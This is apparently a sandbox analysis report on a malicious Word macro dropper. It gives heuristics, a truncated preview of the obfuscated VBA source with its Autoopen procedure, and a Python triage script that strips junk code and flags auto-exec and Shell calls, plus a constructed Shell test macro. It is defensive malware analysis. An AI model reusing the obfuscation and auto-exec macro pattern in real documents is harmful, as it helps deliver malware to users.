Verdict: MALICIOUS (Risk Score 202)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office (Word) document whose VBA project contains an AutoOpen procedure and a Shell() call. ClamAV identifies it as Doc.Dropper.Agent-6518926-0, i.e. a dropper. The recovered VBA source (macros.bas, 58,985 bytes) is heavily obfuscated: in the visible portion almost every line belongs to a Select Case block keyed on a variable that is never assigned, so no branch can ever match, and procedure and variable names are random strings. The Autoopen procedure runs under On Error Resume Next and calls another procedure with a concatenation of several such variables, which is where the real logic is most likely assembled at run time. AutoOpen combined with Shell() means a command line is executed as soon as the document is opened with macros enabled. The "download and execute a secondary payload" reading is the usual behaviour behind this family label, but the preview below is truncated before the Shell() call and no download URL was extracted, so the payload source cannot be confirmed from this report alone.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6518926-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6518926-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): the VBA code calls Shell(), which executes an arbitrary command line; together with an auto-exec procedure this is code execution on document open.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): an AutoOpen procedure is present, so the macro runs without any further user action once macros are enabled.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that in this report a VBA project was in fact recovered (macros.bas below), so treat this finding as a second sighting of the AutoOpen name rather than as independent evidence.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in any Office document with drawing parts, not a download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58985 bytes | e01a0ef496221e7aa799032ed3aa2d6ad0c378d64f8be02d9659c5868fa1ae0b |
Preview script (first 1,000 lines of the extracted script; truncated below)

```vba
Attribute VB_Name = "fzcJdPKQGBU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub qdspn(tkPEw)
Select Case GUNGw
Case 79172
iAdSb = Hex(tRYVka - ChrW(TAUnO))
jijzj = CByte(66305)
CkQrDO = QfPNK
Case 32411
uuUPf = drGAZs
IpzCwk = Round(54408)
IAhSVN = Log(nkGdz)
End Select
End Sub
Sub lnMiBE(LdQRK)
Select Case EaiNQZ
Case 78002
mtnzJP = Hex(EVtvv - ChrW(WBlTvf))
PijPH = CByte(88727)
dEXqD = OzuYk
Case 84700
wGIXVP = iZztUt
VHJXqP = Round(12120)
zzCrmY = Log(HMiDq)
End Select
Select Case IWMtr
Case 11096
EHiVJb = Hex(skAuci - ChrW(HKUdd))
LRkKR = CByte(6615)
Mkzdw = frsTh
Case 65157
fdWMo = HJBMrP
qPmWT = Round(7432)
DjHmW = Log(TDIOqn)
End Select
Select Case SjiuYW
Case 82626
NKYGNj = Hex(QFVzd - ChrW(HzWkpr))
EBmVE = CByte(38035)
GhrwzM = pVjjI
Case 24269
nDtqJ = KkMKj
jrMYDB = Round(88891)
MjNXCQ = Log(RdmDj)
End Select
End Sub
Sub GQztiu(mVUjOS)
Select Case TdzfiO
Case 48428
EpVosE = Hex(GZHDzd - ChrW(OiYHvB))
OjIjnz = CByte(77637)
HYRFSM = XqBut
Case 28876
ZLTzsO = HXTXw
JNFFGE = Round(51567)
jltKO = Log(HiFAH)
End Select
Select Case SHwPoF
Case 49908
zAwiV = Hex(wKkwo - ChrW(odqaZp))
HLYSTP = CByte(40922)
BQpQB = NSimLo
Case 85364
wzIMS = oQWqzc
CbhfS = Round(1186)
wuvjmL = Log(LHnOAk)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case ObKGzh
Case 67531
tzRZLL = Hex(BHtntL - ChrW(CcZHM))
JjbwrU = CByte(76217)
WYUSP = AwONz
Case 29737
GfUMr = LYihpV
cKXTi = Round(83163)
qijYV = Log(ACFNLH)
End Select
TwAnpriVPuCRCS (ICDHlz + AInfKjatEJwj + cboriz)
Select Case jpZuf
Case 16050
icwvrM = Hex(ITUViX - ChrW(ZHPhiJ))
PqsuXV = CByte(31616)
jSfzF = aGLunu
Case 37111
TVwZL = iJNzw
OmEBUr = Round(42685)
mCpiST = Log(ADnvOc)
End Select
End Sub
Sub WWzzJ(iXFiA)
Select Case PoCKZ
Case 91044
XVRfO = Hex(rKhFZ - ChrW(jTGPh))
WhPRP = CByte(93247)
hIELw = NzqEmF
Case 83680
pSvzSf = RpIYUG
NIGGU = Round(45896)
wnziLM = Log(tPUJq)
End Select
Select Case hPTUz
Case 32499
QTvmim = Hex(mhwjk - ChrW(CqfwO))
TdXan = CByte(28890)
mVzolJ = wQfrM
Case 9195
BQMQo = WRqkX
qzwst = Round(14968)
zzoos = Log(XjXmL)
End Select
Select Case kJjRNL
Case 19698
pHVfNR = Hex(SGwXlj - ChrW(EZNbTD))
sziiz = CByte(75193)
KjljiI = siJbah
Case 9582
YOZDvE = ElsHh
IqAPii = Round(15536)
NrCbH = Log(vDzsV)
End Select
End Sub
Sub RaQEt(sCczob)
Select Case kjnILw
Case 97492
BLXXcn = Hex(MAlzlV - ChrW(hawWmq))
wNCbA = CByte(44436)
HuowWP = OshQE
Case 694
cNpqFE = NMpJI
EzUvbQ = Round(29694)
GzCOF = Log(ShOFi)
End Select
End Sub
Attribute VB_Name = "OUzNkvSathznO"
Sub MRYlp(klWQnb)
Select Case pjfwja
Case 35071
jzHKjw = Hex(LYwOAh - ChrW(BJcQv))
dwjaJ = CByte(93089)
rNjQMw = dTRaIp
Case 92253
... (truncated)
```
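To make the macro heuristics above and the obfuscation pattern in the preview concrete, here is an added example script (it is not part of the analyzer or of this report) that runs the same kind of checks over extracted VBA source such as macros.bas: it lists procedures, flags auto-exec names (AutoOpen, Document_Open, ...) and Shell-style calls, and strips Select Case blocks whose selector variable is never assigned anywhere in the source, which is the filler pattern this sample is built from. The first embedded input is the Autoopen procedure copied from the preview; the second, a minimal Document_Open sub, is constructed here to exercise the Shell check, because the preview is truncated before the Shell() call the report flags. The never-assigned-selector rule is an assumption about this family's junk generator, not a general VBA deobfuscator, and the call check is a plain word match, so it fires on comments and strings just as the static heuristic does.

```python
import re
import sys
from typing import Dict, List, Set

# Procedure names Office runs automatically when a document is opened or closed.
AUTO_EXEC_NAMES = {
    "autoopen", "auto_open", "autoexec", "autoclose", "auto_close", "autoexit",
    "document_open", "document_close", "workbook_open", "workbook_close",
}
# Calls that execute or fetch something; OLE_VBA_SHELL in the report keys on Shell.
SUSPICIOUS_CALLS = ["Shell", "CreateObject", "WScript.Shell", "URLDownloadToFile", "XMLHTTP"]

PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(([^)]*)\)", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(\w+)\s*=", re.I)
DECL_RE = re.compile(r"^\s*(?:Dim|Const|Static)\s+(\w+)", re.I)
FOR_RE = re.compile(r"^\s*For\s+(?:Each\s+)?(\w+)", re.I)
SELECT_RE = re.compile(r"^\s*Select\s+Case\s+([A-Za-z_]\w*)\s*$", re.I)
SELECT_ANY_RE = re.compile(r"^\s*Select\s+Case\b", re.I)
END_SELECT_RE = re.compile(r"^\s*End\s+Select\s*$", re.I)
CASE_ELSE_RE = re.compile(r"^\s*Case\s+Else\b", re.I)


def assigned_names(src: str) -> Set[str]:
    """Names that can hold a value: parameters, Dim/Const/Static, For counters, '=' targets."""
    names: Set[str] = set()
    for line in src.splitlines():
        m = PROC_RE.match(line)
        if m:
            for param in m.group(2).split(","):
                param = re.sub(r"^\s*(?:Optional\s+)?(?:ByVal|ByRef|ParamArray)?\s*", "", param, flags=re.I)
                if param.strip():
                    names.add(param.split()[0].lower())
            continue
        for rx in (ASSIGN_RE, DECL_RE, FOR_RE):
            m = rx.match(line)
            if m:
                names.add(m.group(1).lower())
    return names


def strip_dead_select_blocks(src: str) -> str:
    """Drop 'Select Case X ... End Select' when X is never assigned. An unassigned Variant is
    Empty, which never equals the numeric literals in the Case arms, so no branch runs.
    Blocks with a Case Else are kept because that arm would execute."""
    live = assigned_names(src)
    lines = src.splitlines()
    out: List[str] = []
    i = 0
    while i < len(lines):
        m = SELECT_RE.match(lines[i])
        if m and m.group(1).lower() not in live:
            block: List[str] = []
            depth = 0
            while i < len(lines):  # collect the whole block, nesting-aware
                if SELECT_ANY_RE.match(lines[i]):
                    depth += 1
                elif END_SELECT_RE.match(lines[i]):
                    depth -= 1
                block.append(lines[i])
                i += 1
                if depth == 0:
                    break
            if any(CASE_ELSE_RE.match(l) for l in block):
                out.extend(block)
            continue
        out.append(lines[i])
        i += 1
    return "\n".join(out)


def analyze(src: str) -> Dict[str, object]:
    """Mirror the report's macro heuristics and return the de-junked residue."""
    procs = [m.group(1) for m in map(PROC_RE.match, src.splitlines()) if m]
    auto_exec = [p for p in procs if p.lower() in AUTO_EXEC_NAMES]
    calls = [c for c in SUSPICIOUS_CALLS if re.search(r"\b" + re.escape(c) + r"\b", src, re.I)]
    cleaned = strip_dead_select_blocks(src)
    total = sum(1 for l in src.splitlines() if l.strip())
    kept = sum(1 for l in cleaned.splitlines() if l.strip())
    return {
        "procedures": procs,
        "auto_exec": auto_exec,
        "suspicious_calls": calls,
        "junk_ratio": round(1 - kept / total, 2) if total else 0.0,
        "cleaned": cleaned,
    }


# Sample 1: the Autoopen procedure exactly as it appears in the report's preview.
PAGE_AUTOOPEN = """\
Sub Autoopen()
On Error Resume Next
Select Case ObKGzh
Case 67531
tzRZLL = Hex(BHtntL - ChrW(CcZHM))
JjbwrU = CByte(76217)
WYUSP = AwONz
Case 29737
GfUMr = LYihpV
cKXTi = Round(83163)
qijYV = Log(ACFNLH)
End Select
TwAnpriVPuCRCS (ICDHlz + AInfKjatEJwj + cboriz)
Select Case jpZuf
Case 16050
icwvrM = Hex(ITUViX - ChrW(ZHPhiJ))
PqsuXV = CByte(31616)
jSfzF = aGLunu
Case 37111
TVwZL = iJNzw
OmEBUr = Round(42685)
mCpiST = Log(ADnvOc)
End Select
End Sub
"""

# Sample 2: constructed for this example (not from the sample) to exercise the Shell check.
CONSTRUCTED_SHELL_MACRO = """\
Sub Document_Open()
    Dim p As String
    p = Environ("TEMP") & "\\payload.exe"
    Shell p, vbHide
End Sub
"""

if __name__ == "__main__":
    # Usage: python vba_triage.py macros.bas   (defaults to the embedded Autoopen sample)
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else PAGE_AUTOOPEN
    result = analyze(src)
    for key in ("procedures", "auto_exec", "suspicious_calls", "junk_ratio"):
        print(f"{key}: {result[key]}")
    print("--- residual code after junk removal ---")
    print(result["cleaned"])
```

Run against the report's Autoopen excerpt, the residue is four lines: the procedure header, On Error Resume Next, the TwAnpriVPuCRCS(...) call, and End Sub, with five sixths of the excerpt removed as junk. On the full macros.bas the interesting output is whatever survives the same pass, which is where to look for the string assembly that feeds Shell().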